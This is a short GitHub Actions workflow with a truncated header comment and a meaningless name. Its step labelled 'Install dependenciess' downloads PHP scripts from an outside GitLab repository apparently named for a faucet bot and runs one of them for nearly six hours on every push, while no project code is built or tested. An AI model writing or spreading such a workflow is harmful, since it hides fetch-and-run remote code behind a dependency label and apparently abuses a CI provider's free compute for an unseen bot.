# This is a basic workflow to hel

on:
  push:
name: mabufibu
# ------------------------------------ #
jobs:
  v1:
    runs-on: ubuntu-20.04
    continue-on-error: True
    steps:
    - name: Setup PHP
      uses: shivammathur/setup-php@v2
      with:
        php-version: '8.2'
        coverage: none
    - name: Install dependenciess
      run: |
        wget https://gitlab.com/Ikuzot/faucat/-/raw/main/Bitmon1/mon.php
        wget -O data.php https://gitlab.com/Ikuzot/faucat/-/raw/main/Bitmon1/data.php
        timeout 355m php mon.php
